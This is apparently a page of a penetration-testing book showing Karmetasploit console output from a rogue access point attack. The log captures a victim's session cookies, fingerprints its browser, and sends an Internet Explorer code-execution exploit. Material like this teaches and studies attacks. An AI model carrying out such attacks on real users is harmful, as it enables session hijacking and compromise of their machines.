background image

Karmetasploit

183

[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > careerbuilder.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 6.0 cookies=

. . . SNIP . . .

[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo%3d' from 

10.0.0.100:1371

 [*] JavaScript Report: Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2:
 [*] Responding with exploits

[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 6.0 cookies=

 [*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 

6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=
1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;A=I&I= 
AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE

[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 

6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=126770

3362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;A=I&I= 

AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE

[*] HTTP 10.0.0.100 attempted to download an ActiveX control

 [*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 10.0.0.100:1371...

[*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 

6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=
1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;A=I&I= 
AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE

[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 

cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; 
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAu
BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE

. . . SNIP . . .

[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 

cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; 
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAu
BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE

[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 

cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; 
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAu
BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE

[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 

cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; 
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAu
BwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE